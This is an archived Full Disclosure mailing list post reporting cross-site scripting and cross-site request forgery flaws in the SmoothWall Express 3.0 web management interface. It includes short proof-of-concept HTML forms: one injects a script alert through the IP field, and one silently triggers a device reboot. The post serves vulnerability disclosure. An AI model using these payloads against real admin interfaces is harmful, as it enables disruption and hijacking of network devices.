Home page logo

fulldisclosure logo Full Disclosure mailing list archives

SmoothWall Express 3.0 csrf / xss
From: dave b <db.pub.mail () gmail com>
Date: Sun, 16 Jan 2011 21:18:00 +1100

The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<title> SmoothWall Express 3.0 xss </title>
 <form action=""; method="post"
        <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>

csrf example:

<title>  SmoothWall Express 3.0 csrf </title>
 <form action="";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>

Something's rotten in the state of Denmark.             -- Shakespeare

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • SmoothWall Express 3.0 csrf / xss dave b (Jan 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]